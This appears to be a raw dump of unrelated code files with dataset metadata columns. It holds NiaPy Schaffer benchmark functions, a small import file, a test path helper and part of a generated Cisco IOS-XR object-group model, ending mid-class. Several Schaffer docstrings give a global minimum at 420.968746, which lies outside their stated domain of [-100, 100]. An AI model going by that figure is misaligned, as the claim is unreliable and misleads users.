Benchmark.__init__(self, Lower, Upper)
@staticmethod
def latex_code():
"""Return the latex code of the problem.
Returns:
[str] -- latex code.
"""
return r"""$f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$"""
@classmethod
def function(cls):
"""Return benchmark evaluation function.
Returns:
[fun] -- Evaluation function.
"""
def evaluate(D, sol):
return 0.5 + (sin(sol[0] ** 2 - sol[1] ** 2) ** 2 - 0.5) / (1 + 0.001 * (sol[0] ** 2 + sol[1] ** 2)) ** 2
return evaluate
class SchafferN4(Benchmark):
r"""Implementations of Schaffer N. 4 functions.
Date: 2018
Author: Klemen Berkovič
License: MIT
Function: **Schaffer N. 4 Function**
:math:`f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }`
**Input domain:**
The function can be defined on any input domain but it is usually
evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.
**Global minimum:** :math:`f(x^*) = 0`, at :math:`x^* = (420.968746,...,420.968746)`
LaTeX formats:
Inline:
$f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$
Equation:
\begin{equation} f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 } \end{equation}
Domain:
$-100 \leq x_i \leq 100$
Reference:
http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
"""
Name = ["SchafferN4"]
def __init__(self, Lower=-100.0, Upper=100.0):
r"""Initialize Schaffer N. 4 benchmark.
Args:
Lower (Optional[float]): Lower bound of problem.
Upper (Optional[float]): Upper bound of problem.
See Also:
:func:`NiaPy.benchmarks.Benchmark.__init__`
"""
Benchmark.__init__(self, Lower, Upper)
@staticmethod
def latex_code():
"""Return the latex code of the problem.
Returns:
[str] -- latex code.
"""
return r"""$f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$"""
@classmethod
def function(cls):
"""Return benchmark evaluation function.
Returns:
[fun] -- Evaluation function.
"""
def evaluate(D, sol):
return 0.5 + (cos(sin(sol[0] ** 2 - sol[1] ** 2)) ** 2 - 0.5) / (1 + 0.001 * (sol[0] ** 2 + sol[1] ** 2)) ** 2
return evaluate
class ExpandedSchaffer(Benchmark):
r"""Implementations of Expanded Schaffer functions.
Date: 2018
Author: Klemen Berkovič
License: MIT
Function: **Expanded Schaffer Function**
:math:`f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2`
**Input domain:**
The function can be defined on any input domain but it is usually
evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.
**Global minimum:** :math:`f(x^*) = 0`, at :math:`x^* = (420.968746,...,420.968746)`
LaTeX formats:
Inline:
$f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2$
Equation:
\begin{equation} f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2 \end{equation}
Domain:
$-100 \leq x_i \leq 100$
Reference:
http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
"""
Name = ["ExpandedSchaffer"]
def __init__(self, Lower=-100.0, Upper=100.0):
r"""Initialize Expanded Schaffer benchmark.
Args:
Lower (Optional[float]): Lower bound of problem.
Upper (Optional[float]): Upper bound of problem.
See Also:
:func:`NiaPy.benchmarks.Benchmark.__init__`
"""
Benchmark.__init__(self, Lower, Upper)
@staticmethod
def latex_code():
"""Return the latex code of the problem.
Returns:
[str] -- latex code.
"""
return r"""$f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2$"""
@classmethod
def function(cls):
"""Return benchmark evaluation function.
Returns:
[fun] -- Evaluation function.
"""
def g(x, y):
return 0.5 + (sin(sqrt(x ** 2 + y ** 2)) ** 2 - 0.5) / (1 + 0.001 * (x ** 2 + y ** 2)) ** 2
def evaluate(D, sol):
val = 0.0
for i in range(1, D):
val += g(sol[i - 1], sol[i])
return g(sol[D - 1], sol[0]) + val
return evaluate
| 30.213992
| 218
| 0.528466
| 1,090
| 7,342
| 3.458716
| 0.110092
| 0.015915
| 0.025464
| 0.029708
| 0.892042
| 0.886737
| 0.867639
| 0.864191
| 0.852255
| 0.837666
| 0
| 0.09512
| 0.288341
| 7,342
| 242
| 219
| 30.338843
| 0.625837
| 0.618769
| 0
| 0.48
| 0
| 0.06
| 0.241913
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.26
| false
| 0
| 0.04
| 0.06
| 0.62
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
54fcf7b7e772c8ddb0c5489080d6c9e01977dafd
| 220
|
py
|
Python
|
src/recording_script_generator/core/selection/__init__.py
|
stefantaubert/recording-script-generator
|
01cdcd4b85ed7f245f4bb8535d870c04472746c9
|
[
"MIT"
] | null | null | null |
src/recording_script_generator/core/selection/__init__.py
|
stefantaubert/recording-script-generator
|
01cdcd4b85ed7f245f4bb8535d870c04472746c9
|
[
"MIT"
] | null | null | null |
src/recording_script_generator/core/selection/__init__.py
|
stefantaubert/recording-script-generator
|
01cdcd4b85ed7f245f4bb8535d870c04472746c9
|
[
"MIT"
] | null | null | null |
from recording_script_generator.core.selection.detection import *
from recording_script_generator.core.selection.modify import (
add_to_selection_inplace, remove_from_selection_inplace,
select_selection_inplace)
| 44
| 65
| 0.863636
| 27
| 220
| 6.592593
| 0.518519
| 0.269663
| 0.213483
| 0.314607
| 0.460674
| 0.460674
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086364
| 220
| 4
| 66
| 55
| 0.885572
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
074481682d519769c4063b41fd4b09a0f8dc104a
| 219
|
py
|
Python
|
tests/context.py
|
davidkwast/space_cube
|
63e8c26245234e6151e73cceb55cbd701e501c3c
|
[
"MIT"
] | null | null | null |
tests/context.py
|
davidkwast/space_cube
|
63e8c26245234e6151e73cceb55cbd701e501c3c
|
[
"MIT"
] | null | null | null |
tests/context.py
|
davidkwast/space_cube
|
63e8c26245234e6151e73cceb55cbd701e501c3c
|
[
"MIT"
] | 1
|
2019-08-08T01:50:52.000Z
|
2019-08-08T01:50:52.000Z
|
import os
import sys
print()
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'../game')))
print(sys.path)
| 21.9
| 88
| 0.703196
| 37
| 219
| 3.945946
| 0.324324
| 0.246575
| 0.164384
| 0.191781
| 0.739726
| 0.739726
| 0.739726
| 0.739726
| 0.739726
| 0.739726
| 0
| 0.009756
| 0.063927
| 219
| 9
| 89
| 24.333333
| 0.702439
| 0.392694
| 0
| 0
| 0
| 0
| 0.015267
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0.4
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
0747e7ffdfee3af099a0ae9f61557a96426dd7d7
| 121,791
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_objmgr_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_objmgr_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_objmgr_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_infra_objmgr_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR infra\-objmgr package operational data.
This module contains definitions
for the following management objects\:
object\-group\: Object\-group operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EndPort(Enum):
"""
EndPort (Enum Class)
End port
.. data:: echo = 7
Echo (7)
.. data:: discard = 9
Discard (9)
.. data:: daytime = 13
Daytime (13)
.. data:: chargen = 19
Character generator (19)
.. data:: ftp_data = 20
FTP data connections (used infrequently, 20)
.. data:: ftp = 21
File Transfer Protocol (21)
.. data:: ssh = 22
Secure Shell (22)
.. data:: telnet = 23
Telnet (23)
.. data:: smtp = 25
Simple Mail Transport Protocol (25)
.. data:: time = 37
Time (37)
.. data:: nicname = 43
Nicname (43)
.. data:: tacacs = 49
TAC Access Control System (49)
.. data:: domain = 53
Domain Name Service (53)
.. data:: gopher = 70
Gopher (70)
.. data:: finger = 79
Finger (79)
.. data:: www = 80
World Wide Web (HTTP, 80)
.. data:: host_name = 101
NIC hostname server (101)
.. data:: pop2 = 109
Post Office Protocol v2 (109)
.. data:: pop3 = 110
Post Office Protocol v3 (110)
.. data:: sun_rpc = 111
Sun Remote Procedure Call (111)
.. data:: ident = 113
Ident Protocol (113)
.. data:: nntp = 119
Network News Transport Protocol (119)
.. data:: bgp = 179
Border Gateway Protocol (179)
.. data:: irc = 194
Internet Relay Chat (194)
.. data:: pim_auto_rp = 496
PIM Auto-RP (496)
.. data:: exec_ = 512
Exec (rsh, 512)
.. data:: login = 513
Login (rlogin, 513)
.. data:: cmd = 514
Remote commands (rcmd, 514)
.. data:: lpd = 515
Printer service (515)
.. data:: uucp = 540
Unix-to-Unix Copy Program (540)
.. data:: klogin = 543
Kerberos login (543)
.. data:: kshell = 544
Kerberos shell (544)
.. data:: talk = 517
Talk (517)
.. data:: ldp = 646
LDP session connection attempts (MPLS, 646)
"""
echo = Enum.YLeaf(7, "echo")
discard = Enum.YLeaf(9, "discard")
daytime = Enum.YLeaf(13, "daytime")
chargen = Enum.YLeaf(19, "chargen")
ftp_data = Enum.YLeaf(20, "ftp-data")
ftp = Enum.YLeaf(21, "ftp")
ssh = Enum.YLeaf(22, "ssh")
telnet = Enum.YLeaf(23, "telnet")
smtp = Enum.YLeaf(25, "smtp")
time = Enum.YLeaf(37, "time")
nicname = Enum.YLeaf(43, "nicname")
tacacs = Enum.YLeaf(49, "tacacs")
domain = Enum.YLeaf(53, "domain")
gopher = Enum.YLeaf(70, "gopher")
finger = Enum.YLeaf(79, "finger")
www = Enum.YLeaf(80, "www")
host_name = Enum.YLeaf(101, "host-name")
pop2 = Enum.YLeaf(109, "pop2")
pop3 = Enum.YLeaf(110, "pop3")
sun_rpc = Enum.YLeaf(111, "sun-rpc")
ident = Enum.YLeaf(113, "ident")
nntp = Enum.YLeaf(119, "nntp")
bgp = Enum.YLeaf(179, "bgp")
irc = Enum.YLeaf(194, "irc")
pim_auto_rp = Enum.YLeaf(496, "pim-auto-rp")
exec_ = Enum.YLeaf(512, "exec")
login = Enum.YLeaf(513, "login")
cmd = Enum.YLeaf(514, "cmd")
lpd = Enum.YLeaf(515, "lpd")
uucp = Enum.YLeaf(540, "uucp")
klogin = Enum.YLeaf(543, "klogin")
kshell = Enum.YLeaf(544, "kshell")
talk = Enum.YLeaf(517, "talk")
ldp = Enum.YLeaf(646, "ldp")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['EndPort']
class Port(Enum):
"""
Port (Enum Class)
Port
.. data:: echo = 7
Echo (7)
.. data:: discard = 9
Discard (9)
.. data:: daytime = 13
Daytime (13)
.. data:: chargen = 19
Character generator (19)
.. data:: ftp_data = 20
FTP data connections (used infrequently, 20)
.. data:: ftp = 21
File Transfer Protocol (21)
.. data:: ssh = 22
Secure Shell (22)
.. data:: telnet = 23
Telnet (23)
.. data:: smtp = 25
Simple Mail Transport Protocol (25)
.. data:: time = 37
Time (37)
.. data:: nicname = 43
Nicname (43)
.. data:: tacacs = 49
TAC Access Control System (49)
.. data:: domain = 53
Domain Name Service (53)
.. data:: gopher = 70
Gopher (70)
.. data:: finger = 79
Finger (79)
.. data:: www = 80
World Wide Web (HTTP, 80)
.. data:: host_name = 101
NIC hostname server (101)
.. data:: pop2 = 109
Post Office Protocol v2 (109)
.. data:: pop3 = 110
Post Office Protocol v3 (110)
.. data:: sun_rpc = 111
Sun Remote Procedure Call (111)
.. data:: ident = 113
Ident Protocol (113)
.. data:: nntp = 119
Network News Transport Protocol (119)
.. data:: bgp = 179
Border Gateway Protocol (179)
.. data:: irc = 194
Internet Relay Chat (194)
.. data:: pim_auto_rp = 496
PIM Auto-RP (496)
.. data:: exec_ = 512
Exec (rsh, 512)
.. data:: login = 513
Login (rlogin, 513)
.. data:: cmd = 514
Remote commands (rcmd, 514)
.. data:: lpd = 515
Printer service (515)
.. data:: uucp = 540
Unix-to-Unix Copy Program (540)
.. data:: klogin = 543
Kerberos login (543)
.. data:: kshell = 544
Kerberos shell (544)
.. data:: talk = 517
Talk (517)
.. data:: ldp = 646
LDP session connection attempts (MPLS, 646)
"""
echo = Enum.YLeaf(7, "echo")
discard = Enum.YLeaf(9, "discard")
daytime = Enum.YLeaf(13, "daytime")
chargen = Enum.YLeaf(19, "chargen")
ftp_data = Enum.YLeaf(20, "ftp-data")
ftp = Enum.YLeaf(21, "ftp")
ssh = Enum.YLeaf(22, "ssh")
telnet = Enum.YLeaf(23, "telnet")
smtp = Enum.YLeaf(25, "smtp")
time = Enum.YLeaf(37, "time")
nicname = Enum.YLeaf(43, "nicname")
tacacs = Enum.YLeaf(49, "tacacs")
domain = Enum.YLeaf(53, "domain")
gopher = Enum.YLeaf(70, "gopher")
finger = Enum.YLeaf(79, "finger")
www = Enum.YLeaf(80, "www")
host_name = Enum.YLeaf(101, "host-name")
pop2 = Enum.YLeaf(109, "pop2")
pop3 = Enum.YLeaf(110, "pop3")
sun_rpc = Enum.YLeaf(111, "sun-rpc")
ident = Enum.YLeaf(113, "ident")
nntp = Enum.YLeaf(119, "nntp")
bgp = Enum.YLeaf(179, "bgp")
irc = Enum.YLeaf(194, "irc")
pim_auto_rp = Enum.YLeaf(496, "pim-auto-rp")
exec_ = Enum.YLeaf(512, "exec")
login = Enum.YLeaf(513, "login")
cmd = Enum.YLeaf(514, "cmd")
lpd = Enum.YLeaf(515, "lpd")
uucp = Enum.YLeaf(540, "uucp")
klogin = Enum.YLeaf(543, "klogin")
kshell = Enum.YLeaf(544, "kshell")
talk = Enum.YLeaf(517, "talk")
ldp = Enum.YLeaf(646, "ldp")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['Port']
class PortOperator(Enum):
"""
PortOperator (Enum Class)
Port operator
.. data:: equal = 0
Match packets on ports equal to entered port
number
.. data:: not_equal = 1
Match packets on ports not equal to entered
port number
.. data:: greater_than = 2
Match packets on ports greater than entered
port number
.. data:: less_than = 3
Match packets on ports less than entered port
number
"""
equal = Enum.YLeaf(0, "equal")
not_equal = Enum.YLeaf(1, "not-equal")
greater_than = Enum.YLeaf(2, "greater-than")
less_than = Enum.YLeaf(3, "less-than")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['PortOperator']
class StartPort(Enum):
"""
StartPort (Enum Class)
Start port
.. data:: echo = 7
Echo (7)
.. data:: discard = 9
Discard (9)
.. data:: daytime = 13
Daytime (13)
.. data:: chargen = 19
Character generator (19)
.. data:: ftp_data = 20
FTP data connections (used infrequently, 20)
.. data:: ftp = 21
File Transfer Protocol (21)
.. data:: ssh = 22
Secure Shell (22)
.. data:: telnet = 23
Telnet (23)
.. data:: smtp = 25
Simple Mail Transport Protocol (25)
.. data:: time = 37
Time (37)
.. data:: nicname = 43
Nicname (43)
.. data:: tacacs = 49
TAC Access Control System (49)
.. data:: domain = 53
Domain Name Service (53)
.. data:: gopher = 70
Gopher (70)
.. data:: finger = 79
Finger (79)
.. data:: www = 80
World Wide Web (HTTP, 80)
.. data:: host_name = 101
NIC hostname server (101)
.. data:: pop2 = 109
Post Office Protocol v2 (109)
.. data:: pop3 = 110
Post Office Protocol v3 (110)
.. data:: sun_rpc = 111
Sun Remote Procedure Call (111)
.. data:: ident = 113
Ident Protocol (113)
.. data:: nntp = 119
Network News Transport Protocol (119)
.. data:: bgp = 179
Border Gateway Protocol (179)
.. data:: irc = 194
Internet Relay Chat (194)
.. data:: pim_auto_rp = 496
PIM Auto-RP (496)
.. data:: exec_ = 512
Exec (rsh, 512)
.. data:: login = 513
Login (rlogin, 513)
.. data:: cmd = 514
Remote commands (rcmd, 514)
.. data:: lpd = 515
Printer service (515)
.. data:: uucp = 540
Unix-to-Unix Copy Program (540)
.. data:: klogin = 543
Kerberos login (543)
.. data:: kshell = 544
Kerberos shell (544)
.. data:: talk = 517
Talk (517)
.. data:: ldp = 646
LDP session connection attempts (MPLS, 646)
"""
echo = Enum.YLeaf(7, "echo")
discard = Enum.YLeaf(9, "discard")
daytime = Enum.YLeaf(13, "daytime")
chargen = Enum.YLeaf(19, "chargen")
ftp_data = Enum.YLeaf(20, "ftp-data")
ftp = Enum.YLeaf(21, "ftp")
ssh = Enum.YLeaf(22, "ssh")
telnet = Enum.YLeaf(23, "telnet")
smtp = Enum.YLeaf(25, "smtp")
time = Enum.YLeaf(37, "time")
nicname = Enum.YLeaf(43, "nicname")
tacacs = Enum.YLeaf(49, "tacacs")
domain = Enum.YLeaf(53, "domain")
gopher = Enum.YLeaf(70, "gopher")
finger = Enum.YLeaf(79, "finger")
www = Enum.YLeaf(80, "www")
host_name = Enum.YLeaf(101, "host-name")
pop2 = Enum.YLeaf(109, "pop2")
pop3 = Enum.YLeaf(110, "pop3")
sun_rpc = Enum.YLeaf(111, "sun-rpc")
ident = Enum.YLeaf(113, "ident")
nntp = Enum.YLeaf(119, "nntp")
bgp = Enum.YLeaf(179, "bgp")
irc = Enum.YLeaf(194, "irc")
pim_auto_rp = Enum.YLeaf(496, "pim-auto-rp")
exec_ = Enum.YLeaf(512, "exec")
login = Enum.YLeaf(513, "login")
cmd = Enum.YLeaf(514, "cmd")
lpd = Enum.YLeaf(515, "lpd")
uucp = Enum.YLeaf(540, "uucp")
klogin = Enum.YLeaf(543, "klogin")
kshell = Enum.YLeaf(544, "kshell")
talk = Enum.YLeaf(517, "talk")
ldp = Enum.YLeaf(646, "ldp")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['StartPort']
class ObjectGroup(_Entity_):
"""
Object\-group operational data
.. attribute:: port
Port object group
**type**\: :py:class:`Port <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port>`
**config**\: False
.. attribute:: network
Network object group
**type**\: :py:class:`Network <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup, self).__init__()
self._top_entity = None
self.yang_name = "object-group"
self.yang_parent_name = "Cisco-IOS-XR-infra-objmgr-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("port", ("port", ObjectGroup.Port)), ("network", ("network", ObjectGroup.Network))])
self._leafs = OrderedDict()
self.port = ObjectGroup.Port()
self.port.parent = self
self._children_name_map["port"] = "port"
self.network = ObjectGroup.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup, [], name, value)
class Port(_Entity_):
"""
Port object group
.. attribute:: objects
Table of Object
**type**\: :py:class:`Objects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port, self).__init__()
self.yang_name = "port"
self.yang_parent_name = "object-group"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("objects", ("objects", ObjectGroup.Port.Objects))])
self._leafs = OrderedDict()
self.objects = ObjectGroup.Port.Objects()
self.objects.parent = self
self._children_name_map["objects"] = "objects"
self._segment_path = lambda: "port"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port, [], name, value)
class Objects(_Entity_):
"""
Table of Object
.. attribute:: object
Port object group
**type**\: list of :py:class:`Object <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects, self).__init__()
self.yang_name = "objects"
self.yang_parent_name = "port"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("object", ("object", ObjectGroup.Port.Objects.Object))])
self._leafs = OrderedDict()
self.object = YList(self)
self._segment_path = lambda: "objects"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/port/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects, [], name, value)
class Object(_Entity_):
"""
Port object group
.. attribute:: object_name (key)
Port object group name
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_groups
Table of NestedGroup
**type**\: :py:class:`NestedGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.NestedGroups>`
**config**\: False
.. attribute:: operators
Table of Operator
**type**\: :py:class:`Operators <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.Operators>`
**config**\: False
.. attribute:: port_ranges
Table of PortRange
**type**\: :py:class:`PortRanges <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.PortRanges>`
**config**\: False
.. attribute:: parent_groups
Table of ParentGroup
**type**\: :py:class:`ParentGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.ParentGroups>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object, self).__init__()
self.yang_name = "object"
self.yang_parent_name = "objects"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['object_name']
self._child_classes = OrderedDict([("nested-groups", ("nested_groups", ObjectGroup.Port.Objects.Object.NestedGroups)), ("operators", ("operators", ObjectGroup.Port.Objects.Object.Operators)), ("port-ranges", ("port_ranges", ObjectGroup.Port.Objects.Object.PortRanges)), ("parent-groups", ("parent_groups", ObjectGroup.Port.Objects.Object.ParentGroups))])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
])
self.object_name = None
self.nested_groups = ObjectGroup.Port.Objects.Object.NestedGroups()
self.nested_groups.parent = self
self._children_name_map["nested_groups"] = "nested-groups"
self.operators = ObjectGroup.Port.Objects.Object.Operators()
self.operators.parent = self
self._children_name_map["operators"] = "operators"
self.port_ranges = ObjectGroup.Port.Objects.Object.PortRanges()
self.port_ranges.parent = self
self._children_name_map["port_ranges"] = "port-ranges"
self.parent_groups = ObjectGroup.Port.Objects.Object.ParentGroups()
self.parent_groups.parent = self
self._children_name_map["parent_groups"] = "parent-groups"
self._segment_path = lambda: "object" + "[object-name='" + str(self.object_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/port/objects/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object, ['object_name'], name, value)
class NestedGroups(_Entity_):
"""
Table of NestedGroup
.. attribute:: nested_group
nested object group
**type**\: list of :py:class:`NestedGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.NestedGroups, self).__init__()
self.yang_name = "nested-groups"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("nested-group", ("nested_group", ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup))])
self._leafs = OrderedDict()
self.nested_group = YList(self)
self._segment_path = lambda: "nested-groups"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.NestedGroups, [], name, value)
class NestedGroup(_Entity_):
"""
nested object group
.. attribute:: nested_group_name (key)
Nested object group
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_group_name_xr
Nested group
**type**\: str
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup, self).__init__()
self.yang_name = "nested-group"
self.yang_parent_name = "nested-groups"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nested_group_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nested_group_name', (YLeaf(YType.str, 'nested-group-name'), ['str'])),
('nested_group_name_xr', (YLeaf(YType.str, 'nested-group-name-xr'), ['str'])),
])
self.nested_group_name = None
self.nested_group_name_xr = None
self._segment_path = lambda: "nested-group" + "[nested-group-name='" + str(self.nested_group_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup, ['nested_group_name', 'nested_group_name_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.NestedGroups.NestedGroup']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
